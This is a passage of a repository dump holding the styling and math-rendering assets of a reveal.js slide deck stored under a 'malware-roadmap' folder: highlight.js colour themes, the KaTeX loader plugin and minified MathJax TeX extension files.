#customcontrols > button { 55 | display: none; 56 | } 57 | #customcontrols > ul { 58 | bottom: 20px; 59 | border: none; 60 | background: none; 61 | } 62 | } 63 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/highlight/monokai.css: -------------------------------------------------------------------------------- 1 | /* 2 | Monokai style - ported by Luigi Maselli - http://grigio.org 3 | */ 4 | 5 | .hljs { 6 | display: block; 7 | overflow-x: auto; 8 | padding: 0.5em; 9 | background: #272822; 10 | color: #ddd; 11 | } 12 | 13 | .hljs-tag, 14 | .hljs-keyword, 15 | .hljs-selector-tag, 16 | .hljs-literal, 17 | .hljs-strong, 18 | .hljs-name { 19 | color: #f92672; 20 | } 21 | 22 | .hljs-code { 23 | color: #66d9ef; 24 | } 25 | 26 | .hljs-class .hljs-title { 27 | color: white; 28 | } 29 | 30 | .hljs-attribute, 31 | .hljs-symbol, 32 | .hljs-regexp, 33 | .hljs-link { 34 | color: #bf79db; 35 | } 36 | 37 | .hljs-string, 38 | .hljs-bullet, 39 | .hljs-subst, 40 | .hljs-title, 41 | .hljs-section, 42 | .hljs-emphasis, 43 | .hljs-type, 44 | .hljs-built_in, 45 | .hljs-builtin-name, 46 | .hljs-selector-attr, 47 | .hljs-selector-pseudo, 48 | .hljs-addition, 49 | .hljs-variable, 50 | .hljs-template-tag, 51 | .hljs-template-variable { 52 | color: #a6e22e; 53 | } 54 | 55 | .hljs-comment, 56 | .hljs-quote, 57 | .hljs-deletion, 58 | .hljs-meta { 59 | color: #75715e; 60 | } 61 | 62 | .hljs-keyword, 63 | .hljs-selector-tag, 64 | .hljs-literal, 65 | .hljs-doctag, 66 | .hljs-title, 67 | .hljs-section, 68 | .hljs-type, 69 | .hljs-selector-id { 70 | font-weight: bold; 71 | } 72 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/highlight/zenburn.css: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Zenburn style from voldmar.ru (c) Vladimir Epifanov 4 | based on dark.css by Ivan Sagalaev 5 | 6 | */ 7 | 8 | .hljs { 9 | display: block; 10 | overflow-x: auto; 11 | padding: 0.5em; 12 | background: #3f3f3f; 13 | color: #dcdcdc; 14 | } 15 | 16 | .hljs-keyword, 17 | .hljs-selector-tag, 18 | .hljs-tag { 19 | color: #e3ceab; 20 | } 21 | 22 | .hljs-template-tag { 23 | color: #dcdcdc; 24 | } 25 | 26 | .hljs-number { 27 | color: #8cd0d3; 28 | } 29 | 30 | .hljs-variable, 31 | .hljs-template-variable, 32 | .hljs-attribute { 33 | color: #efdcbc; 34 | } 35 | 36 | .hljs-literal { 37 | color: #efefaf; 38 | } 39 | 40 | .hljs-subst { 41 | color: #8f8f8f; 42 | } 43 | 44 | .hljs-title, 45 | .hljs-name, 46 | .hljs-selector-id, 47 | .hljs-selector-class, 48 | .hljs-section, 49 | .hljs-type { 50 | color: #efef8f; 51 | } 52 | 53 | .hljs-symbol, 54 | .hljs-bullet, 55 | .hljs-link { 56 | color: #dca3a3; 57 | } 58 | 59 | .hljs-deletion, 60 | .hljs-string, 61 | .hljs-built_in, 62 | .hljs-builtin-name { 63 | color: #cc9393; 64 | } 65 | 66 | .hljs-addition, 67 | .hljs-comment, 68 | .hljs-quote, 69 | .hljs-meta { 70 | color: #7f9f7f; 71 | } 72 | 73 | 74 | .hljs-emphasis { 75 | font-style: italic; 76 | } 77 | 78 | .hljs-strong { 79 | font-weight: bold; 80 | } 81 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/katex.js: -------------------------------------------------------------------------------- 1 | /** 2 | * A plugin which enables rendering of math equations inside 3 | * of reveal.js slides. Essentially a thin wrapper for KaTeX. 4 | * 5 | * @author Hakim El Hattab 6 | * @author Gerhard Burger 7 | */ 8 | export const KaTeX = () => { 9 | let deck; 10 | 11 | let defaultOptions = { 12 | version: 'latest', 13 | delimiters: [ 14 | {left: '$$', right: '$$', display: true}, // Note: $$ has to come before $ 15 | {left: '$', right: '$', display: false}, 16 | {left: '\\(', right: '\\)', display: false}, 17 | {left: '\\[', right: '\\]', display: true} 18 | ], 19 | ignoredTags: ['script', 'noscript', 'style', 'textarea', 'pre'] 20 | } 21 | 22 | const loadCss = src => { 23 | let link = document.createElement('link'); 24 | link.rel = 'stylesheet'; 25 | link.href = src; 26 | document.head.appendChild(link); 27 | }; 28 | 29 | /** 30 | * Loads a JavaScript file and returns a Promise for when it is loaded 31 | * Credits: https://aaronsmith.online/easily-load-an-external-script-using-javascript/ 32 | */ 33 | const loadScript = src => { 34 | return new Promise((resolve, reject) => { 35 | const script = document.createElement('script') 36 | script.type = 'text/javascript' 37 | script.onload = resolve 38 | script.onerror = reject 39 | script.src = src 40 | document.head.append(script) 41 | }) 42 | }; 43 | 44 | async function loadScripts(urls) { 45 | for(const url of urls) { 46 | await loadScript(url); 47 | } 48 | } 49 | 50 | return { 51 | id: 'katex', 52 | 53 | init: function (reveal) { 54 | 55 | deck = reveal; 56 | 57 | let revealOptions = deck.getConfig().katex || {}; 58 | 59 | let options = {...defaultOptions, ...revealOptions}; 60 | const {local, version, extensions, ...katexOptions} = options; 61 | 62 | let baseUrl = options.local || 'https://cdn.jsdelivr.net/npm/katex'; 63 | let versionString = options.local ? '' : '@' + options.version; 64 | 65 | let cssUrl = baseUrl + versionString + '/dist/katex.min.css'; 66 | let katexUrl = baseUrl + versionString + '/dist/katex.min.js'; 67 | let mhchemUrl = baseUrl + versionString + '/dist/contrib/mhchem.min.js' 68 | let karUrl = baseUrl + versionString + '/dist/contrib/auto-render.min.js'; 69 | 70 | let katexScripts = [katexUrl]; 71 | if(options.extensions && options.extensions.includes("mhchem")) { 72 | katexScripts.push(mhchemUrl); 73 | } 74 | katexScripts.push(karUrl); 75 | 76 | const renderMath = () => { 77 | renderMathInElement(reveal.getSlidesElement(), katexOptions); 78 | deck.layout(); 79 | } 80 | 81 | loadCss(cssUrl); 82 | 83 | // For some reason dynamically loading with defer attribute doesn't result in the expected behavior, the below code does 84 | loadScripts(katexScripts).then(() => { 85 | if( deck.isReady() ) { 86 | renderMath(); 87 | } 88 | else { 89 | deck.on( 'ready', renderMath.bind( this ) ); 90 | } 91 | }); 92 | 93 | } 94 | } 95 | 96 | }; 97 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/action.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,a,o={669:function(t,a,o){Object.defineProperty(a,"__esModule",{value:!0}),a.ActionConfiguration=a.ActionMethods=void 0;var e=o(251),n=o(193),i=o(871),r=o(360);a.ActionMethods={},a.ActionMethods.Macro=r.default.Macro,a.ActionMethods.Toggle=function(t,a){for(var o,e=[];"\\endtoggle"!==(o=t.GetArgument(a));)e.push(new n.default(o,t.stack.env,t.configuration).mml());t.Push(t.create("node","maction",e,{actiontype:"toggle"}))},a.ActionMethods.Mathtip=function(t,a){var o=t.ParseArg(a),e=t.ParseArg(a);t.Push(t.create("node","maction",[o,e],{actiontype:"tooltip"}))},new i.CommandMap("action-macros",{toggle:"Toggle",mathtip:"Mathtip",texttip:["Macro","\\mathtip{#1}{\\text{#2}}",2]},a.ActionMethods),a.ActionConfiguration=e.Configuration.create("action",{handler:{macro:["action-macros"]}})},955:function(t,a){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,a.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.Configuration=MathJax._.input.tex.Configuration.Configuration,a.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,a.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},871:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,a.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,a.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,a.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,a.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,a.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,a.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,a.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap},193:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.default=MathJax._.input.tex.TexParser.default},360:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.default=MathJax._.input.tex.base.BaseMethods.default}},e={};function n(t){var a=e[t];if(void 0!==a)return a.exports;var i=e[t]={exports:{}};return o[t](i,i.exports,n),i.exports}t=n(955),a=n(669),(0,t.r8)({_:{input:{tex:{action:{ActionConfiguration:a}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/bbox.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,a,e={133:function(t,a,e){Object.defineProperty(a,"__esModule",{value:!0}),a.BboxConfiguration=a.BboxMethods=void 0;var o=e(251),n=e(871),i=e(402);a.BboxMethods={},a.BboxMethods.BBox=function(t,a){for(var e,o,n,u=t.GetBrackets(a,""),l=t.ParseArg(a),x=u.split(/,/),M=0,c=x.length;M=e.length&&(e=void 0),{value:e&&e[n++],done:!e}}};throw new TypeError(t?"Object is not iterable.":"Symbol.iterator is not defined.")};Object.defineProperty(t,"__esModule",{value:!0}),t.CenternotConfiguration=t.filterCenterOver=void 0;var r=a(251),o=a(193),i=a(748),u=a(871),l=a(360);function p(e){var t,a,r=e.data;try{for(var o=n(r.getList("centerOver")),u=o.next();!u.done;u=o.next()){var l=u.value,p=i.default.getTexClass(l.childNodes[0].childNodes[0]);null!==p&&i.default.setProperties(l.parent.parent.parent.parent.parent.parent,{texClass:p})}}catch(e){t={error:e}}finally{try{u&&!u.done&&(a=o.return)&&a.call(o)}finally{if(t)throw t.error}}}new u.CommandMap("centernot",{centerOver:"CenterOver",centernot:["Macro","\\centerOver{#1}{{\u29f8}}",1]},{CenterOver:function(e,t){var a="{"+e.GetArgument(t)+"}",n=e.ParseArg(t),r=new o.default(a,e.stack.env,e.configuration).mml(),i=e.create("node","TeXAtom",[new o.default(a,e.stack.env,e.configuration).mml(),e.create("node","mpadded",[e.create("node","mpadded",[n],{width:0,lspace:"-.5width"}),e.create("node","mphantom",[r])],{width:0,lspace:"-.5width"})]);e.configuration.addNode("centerOver",r),e.Push(i)},Macro:l.default.Macro}),t.filterCenterOver=p,t.CenternotConfiguration=r.Configuration.create("centernot",{handler:{macro:["centernot"]},postprocessors:[p]})},955:function(e,t){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,t.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.Configuration=MathJax._.input.tex.Configuration.Configuration,t.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,t.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},748:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default=MathJax._.input.tex.NodeUtil.default},871:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,t.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,t.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,t.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,t.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,t.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,t.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,t.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap},193:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default=MathJax._.input.tex.TexParser.default},360:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default=MathJax._.input.tex.base.BaseMethods.default}},n={};function r(e){var t=n[e];if(void 0!==t)return t.exports;var o=n[e]={exports:{}};return a[e].call(o.exports,o,o.exports,r),o.exports}e=r(955),t=r(286),(0,e.r8)({_:{input:{tex:{centernot:{CenternotConfiguration:t}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/colorv2.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var o,a,t={888:function(o,a,t){Object.defineProperty(a,"__esModule",{value:!0}),a.ColorConfiguration=a.ColorV2Methods=void 0;var n=t(871),e=t(251);a.ColorV2Methods={Color:function(o,a){var t=o.GetArgument(a),n=o.stack.env.color;o.stack.env.color=t;var e=o.ParseArg(a);n?o.stack.env.color=n:delete o.stack.env.color;var r=o.create("node","mstyle",[e],{mathcolor:t});o.Push(r)}},new n.CommandMap("colorv2",{color:"Color"},a.ColorV2Methods),a.ColorConfiguration=e.Configuration.create("colorv2",{handler:{macro:["colorv2"]}})},955:function(o,a){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,a.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(o,a){Object.defineProperty(a,"__esModule",{value:!0}),a.Configuration=MathJax._.input.tex.Configuration.Configuration,a.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,a.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},871:function(o,a){Object.defineProperty(a,"__esModule",{value:!0}),a.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,a.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,a.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,a.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,a.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,a.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,a.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,a.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap}},n={};function e(o){var a=n[o];if(void 0!==a)return a.exports;var r=n[o]={exports:{}};return t[o](r,r.exports,e),r.exports}o=e(955),a=e(888),(0,o.r8)({_:{input:{tex:{colorv2:{ColorV2Configuration:a}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/enclose.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var a,t,e={272:function(a,t,e){Object.defineProperty(t,"__esModule",{value:!0}),t.EncloseConfiguration=t.EncloseMethods=t.ENCLOSE_OPTIONS=void 0;var o=e(251),n=e(871),r=e(398);t.ENCLOSE_OPTIONS={"data-arrowhead":1,color:1,mathcolor:1,background:1,mathbackground:1,"data-padding":1,"data-thickness":1},t.EncloseMethods={},t.EncloseMethods.Enclose=function(a,e){var o=a.GetArgument(e).replace(/,/g," "),n=a.GetBrackets(e,""),i=a.ParseArg(e),l=r.default.keyvalOptions(n,t.ENCLOSE_OPTIONS);l.notation=o,a.Push(a.create("node","menclose",[i],l))},new n.CommandMap("enclose",{enclose:"Enclose"},t.EncloseMethods),t.EncloseConfiguration=o.Configuration.create("enclose",{handler:{macro:["enclose"]}})},955:function(a,t){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,t.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.Configuration=MathJax._.input.tex.Configuration.Configuration,t.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,t.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},398:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default=MathJax._.input.tex.ParseUtil.default},871:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,t.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,t.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,t.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,t.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,t.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,t.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,t.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap}},o={};function n(a){var t=o[a];if(void 0!==t)return t.exports;var r=o[a]={exports:{}};return e[a](r,r.exports,n),r.exports}a=n(955),t=n(272),(0,a.r8)({_:{input:{tex:{enclose:{EncloseConfiguration:t}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/extpfeil.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,e,a={646:function(t,e,a){Object.defineProperty(e,"__esModule",{value:!0}),e.ExtpfeilConfiguration=e.ExtpfeilMethods=void 0;var o=a(251),n=a(871),r=a(939),i=a(892),u=a(417),x=a(402);e.ExtpfeilMethods={},e.ExtpfeilMethods.xArrow=r.AmsMethods.xArrow,e.ExtpfeilMethods.NewExtArrow=function(t,a){var o=t.GetArgument(a),n=t.GetArgument(a),r=t.GetArgument(a);if(!o.match(/^\\([a-z]+|.)$/i))throw new x.default("NewextarrowArg1","First argument to %1 must be a control sequence name",a);if(!n.match(/^(\d+),(\d+)$/))throw new x.default("NewextarrowArg2","Second argument to %1 must be two integers separated by a comma",a);if(!r.match(/^(\d+|0x[0-9A-F]+)$/i))throw new x.default("NewextarrowArg3","Third argument to %1 must be a unicode character number",a);o=o.substr(1);var u=n.split(",");i.default.addMacro(t,o,e.ExtpfeilMethods.xArrow,[parseInt(r),parseInt(u[0]),parseInt(u[1])])},new n.CommandMap("extpfeil",{xtwoheadrightarrow:["xArrow",8608,12,16],xtwoheadleftarrow:["xArrow",8606,17,13],xmapsto:["xArrow",8614,6,7],xlongequal:["xArrow",61,7,7],xtofrom:["xArrow",8644,12,12],Newextarrow:"NewExtArrow"},e.ExtpfeilMethods);e.ExtpfeilConfiguration=o.Configuration.create("extpfeil",{handler:{macro:["extpfeil"]},init:function(t){u.NewcommandConfiguration.init(t)}})},955:function(t,e){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,e.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.Configuration=MathJax._.input.tex.Configuration.Configuration,e.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,e.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},871:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,e.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,e.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,e.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,e.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,e.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,e.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,e.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap},402:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.default=MathJax._.input.tex.TexError.default},939:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.AmsMethods=MathJax._.input.tex.ams.AmsMethods.AmsMethods,e.NEW_OPS=MathJax._.input.tex.ams.AmsMethods.NEW_OPS},417:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.NewcommandConfiguration=MathJax._.input.tex.newcommand.NewcommandConfiguration.NewcommandConfiguration},892:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.default=MathJax._.input.tex.newcommand.NewcommandUtil.default}},o={};function n(t){var e=o[t];if(void 0!==e)return e.exports;var r=o[t]={exports:{}};return a[t](r,r.exports,n),r.exports}t=n(955),e=n(646),(0,t.r8)({_:{input:{tex:{extpfeil:{ExtpfeilConfiguration:e}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/gensymb.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var a,t,n={82:function(a,t,n){Object.defineProperty(t,"__esModule",{value:!0}),t.GensymbConfiguration=void 0;var e=n(251),o=n(108);new(n(871).CharacterMap)("gensymb-symbols",(function(a,t){var n=t.attributes||{};n.mathvariant=o.TexConstant.Variant.NORMAL,n.class="MathML-Unit";var e=a.create("token","mi",n,t.char);a.Push(e)}),{ohm:"\u2126",degree:"\xb0",celsius:"\u2103",perthousand:"\u2030",micro:"\xb5"}),t.GensymbConfiguration=e.Configuration.create("gensymb",{handler:{macro:["gensymb-symbols"]}})},955:function(a,t){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,t.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.Configuration=MathJax._.input.tex.Configuration.Configuration,t.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,t.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},871:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,t.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,t.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,t.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,t.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,t.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,t.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,t.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap},108:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.TexConstant=MathJax._.input.tex.TexConstants.TexConstant}},e={};function o(a){var t=e[a];if(void 0!==t)return t.exports;var i=e[a]={exports:{}};return n[a](i,i.exports,o),i.exports}a=o(955),t=o(82),(0,a.r8)({_:{input:{tex:{gensymb:{GensymbConfiguration:t}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/html.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,a,e,n={738:function(t,a,e){Object.defineProperty(a,"__esModule",{value:!0}),a.HtmlConfiguration=void 0;var n=e(251),r=e(871),o=e(248);new r.CommandMap("html_macros",{href:"Href",class:"Class",style:"Style",cssId:"Id"},o.default),a.HtmlConfiguration=n.Configuration.create("html",{handler:{macro:["html_macros"]}})},248:function(t,a,e){Object.defineProperty(a,"__esModule",{value:!0});var n=e(748),r={Href:function(t,a){var e=t.GetArgument(a),r=o(t,a);n.default.setAttribute(r,"href",e),t.Push(r)},Class:function(t,a){var e=t.GetArgument(a),r=o(t,a),i=n.default.getAttribute(r,"class");i&&(e=i+" "+e),n.default.setAttribute(r,"class",e),t.Push(r)},Style:function(t,a){var e=t.GetArgument(a),r=o(t,a),i=n.default.getAttribute(r,"style");i&&(";"!==e.charAt(e.length-1)&&(e+=";"),e=i+" "+e),n.default.setAttribute(r,"style",e),t.Push(r)},Id:function(t,a){var e=t.GetArgument(a),r=o(t,a);n.default.setAttribute(r,"id",e),t.Push(r)}},o=function(t,a){var e=t.ParseArg(a);if(!n.default.isInferred(e))return e;var r=n.default.getChildren(e);if(1===r.length)return r[0];var o=t.create("node","mrow");return n.default.copyChildren(e,o),n.default.copyAttributes(e,o),o};a.default=r},955:function(t,a){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,a.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.Configuration=MathJax._.input.tex.Configuration.Configuration,a.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,a.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},748:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.default=MathJax._.input.tex.NodeUtil.default},871:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,a.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,a.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,a.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,a.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,a.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,a.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,a.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap}},r={};function o(t){var a=r[t];if(void 0!==a)return a.exports;var e=r[t]={exports:{}};return n[t](e,e.exports,o),e.exports}t=o(955),a=o(738),e=o(248),(0,t.r8)({_:{input:{tex:{html:{HtmlConfiguration:a,HtmlMethods:e}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/noerrors.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var o,n,r={634:function(o,n,r){Object.defineProperty(n,"__esModule",{value:!0}),n.NoErrorsConfiguration=void 0;var t=r(251);n.NoErrorsConfiguration=t.Configuration.create("noerrors",{nodes:{error:function(o,n,r,t){var e=o.create("token","mtext",{},t.replace(/\n/g," "));return o.create("node","merror",[e],{"data-mjx-error":n,title:n})}}})},955:function(o,n){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,n.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(o,n){Object.defineProperty(n,"__esModule",{value:!0}),n.Configuration=MathJax._.input.tex.Configuration.Configuration,n.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,n.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration}},t={};function e(o){var n=t[o];if(void 0!==n)return n.exports;var a=t[o]={exports:{}};return r[o](a,a.exports,e),a.exports}o=e(955),n=e(634),(0,o.r8)({_:{input:{tex:{noerrors:{NoErrorsConfiguration:n}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/noundefined.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var n,o,t={999:function(n,o,t){var e=this&&this.__values||function(n){var o="function"==typeof Symbol&&Symbol.iterator,t=o&&n[o],e=0;if(t)return t.call(n);if(n&&"number"==typeof n.length)return{next:function(){return n&&e>=n.length&&(n=void 0),{value:n&&n[e++],done:!n}}};throw new TypeError(o?"Object is not iterable.":"Symbol.iterator is not defined.")};Object.defineProperty(o,"__esModule",{value:!0}),o.NoUndefinedConfiguration=void 0;var r=t(251);o.NoUndefinedConfiguration=r.Configuration.create("noundefined",{fallback:{macro:function(n,o){var t,r,i=n.create("text","\\"+o),a=n.options.noundefined||{},u={};try{for(var f=e(["color","background","size"]),l=f.next();!l.done;l=f.next()){var c=l.value;a[c]&&(u["math"+c]=a[c])}}catch(n){t={error:n}}finally{try{l&&!l.done&&(r=f.return)&&r.call(f)}finally{if(t)throw t.error}}n.Push(n.create("node","mtext",[],u,i))}},options:{noundefined:{color:"red",background:"",size:""}},priority:3})},955:function(n,o){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,o.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(n,o){Object.defineProperty(o,"__esModule",{value:!0}),o.Configuration=MathJax._.input.tex.Configuration.Configuration,o.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,o.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration}},e={};function r(n){var o=e[n];if(void 0!==o)return o.exports;var i=e[n]={exports:{}};return t[n].call(i.exports,i,i.exports,r),i.exports}n=r(955),o=r(999),(0,n.r8)({_:{input:{tex:{noundefined:{NoUndefinedConfiguration:o}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/tagformat.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,o,n={941:function(t,o,n){var a,r=this&&this.__extends||(a=function(t,o){return(a=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,o){t.__proto__=o}||function(t,o){for(var n in o)Object.prototype.hasOwnProperty.call(o,n)&&(t[n]=o[n])})(t,o)},function(t,o){if("function"!=typeof o&&null!==o)throw new TypeError("Class extends value "+String(o)+" is not a constructor or null");function n(){this.constructor=t}a(t,o),t.prototype=null===o?Object.create(o):(n.prototype=o.prototype,new n)});Object.defineProperty(o,"__esModule",{value:!0}),o.TagFormatConfiguration=o.tagformatConfig=void 0;var e=n(251),i=n(680),s=0;function u(t,o){var n=o.parseOptions.options.tags;"base"!==n&&t.tags.hasOwnProperty(n)&&i.TagsFactory.add(n,t.tags[n]);var a=function(t){function n(){return null!==t&&t.apply(this,arguments)||this}return r(n,t),n.prototype.formatNumber=function(t){return o.parseOptions.options.tagformat.number(t)},n.prototype.formatTag=function(t){return o.parseOptions.options.tagformat.tag(t)},n.prototype.formatId=function(t){return o.parseOptions.options.tagformat.id(t)},n.prototype.formatUrl=function(t,n){return o.parseOptions.options.tagformat.url(t,n)},n}(i.TagsFactory.create(o.parseOptions.options.tags).constructor),e="configTags-"+ 